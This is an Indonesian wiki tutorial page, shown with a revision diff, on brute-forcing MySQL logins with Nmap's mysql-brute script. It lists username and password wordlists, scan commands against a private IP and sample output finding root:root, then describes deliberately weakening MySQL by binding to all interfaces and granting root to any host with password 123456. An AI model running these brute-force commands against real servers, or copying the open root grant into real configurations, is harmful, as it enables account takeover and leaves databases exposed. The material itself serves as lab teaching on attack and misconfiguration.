Difference between revisions of "Nmap: brute force hack mysql password"

From OnnoWiki
Jump to navigation Jump to search
Line 1: Line 1:
 
Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html
 
Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html
 +
 +
 +
 +
 +
  
  
Line 42: Line 47:
 
  |  Accounts
 
  |  Accounts
 
  |    root:root - Valid credentials
 
  |    root:root - Valid credentials
 +
 +
 +
==Hole di MySQL==
 +
 +
Serangan ini hanya bisa di jalankan kalau mysql salah di konfigurasi
 +
 +
* MySQL yang normal hanya binding ke localhost, artinya hanya mereka yang di localhost yang dapat menyerang.
 +
* MySQL di binding ke interface ethernet, atau ke semua interface, caranya
 +
 +
vi /etc/mysql/mysql.conf.d/mysqld.cnf
 +
 +
# bind-address          = 127.0.0.1
 +
bind-address            = 0.0.0.0
 +
 +
 +
* beri akses root ke IP attacker, atau ke semua IP (asumsi password root=123456)
 +
 +
mysql -u root -p123456
 +
 +
GRANT ALL ON *.* to root@'123.123.123.123' IDENTIFIED BY 'put-your-password';
 +
FLUSH PRIVILEGES;
 +
exit
 +
 +
atau
 +
 +
GRANT ALL ON *.* to root@'%' IDENTIFIED BY '123456';
 +
FLUSH PRIVILEGES;
 +
exit
 +
 +
* cek menggunakan perintah (asumsi password=123456)
 +
 +
mysql -u root -h ip-address-server -p123456
 +
 +
 +
 +
  
 
==Referensi==
 
==Referensi==
  
 
* https://nmap.org/nsedoc/scripts/mysql-brute.html
 
* https://nmap.org/nsedoc/scripts/mysql-brute.html

Revision as of 07:09, 2 June 2018

Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html




File mysql-brute

Script types: portrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/mysql-brute.nse

User Summary

Lakukan hack pada password MySQL.


Example Usage

isi

user.txt
admin
root
dll

isi

pass.txt
123456
123456789
dll


nmap --script=mysql-brute <target>
Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt 192.168.0.100
Nmap  -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.100

Script Output

3306/tcp open  mysql
| mysql-brute:
|   Accounts
|     root:root - Valid credentials


Hole di MySQL

Serangan ini hanya bisa di jalankan kalau mysql salah di konfigurasi

  • MySQL yang normal hanya binding ke localhost, artinya hanya mereka yang di localhost yang dapat menyerang.
  • MySQL di binding ke interface ethernet, atau ke semua interface, caranya
vi /etc/mysql/mysql.conf.d/mysqld.cnf 
# bind-address          = 127.0.0.1
bind-address            = 0.0.0.0


  • beri akses root ke IP attacker, atau ke semua IP (asumsi password root=123456)
mysql -u root -p123456

GRANT ALL ON *.* to root@'123.123.123.123' IDENTIFIED BY 'put-your-password';
FLUSH PRIVILEGES;
exit

atau

GRANT ALL ON *.* to root@'%' IDENTIFIED BY '123456';
FLUSH PRIVILEGES;
exit
  • cek menggunakan perintah (asumsi password=123456)
mysql -u root -h ip-address-server -p123456



Referensi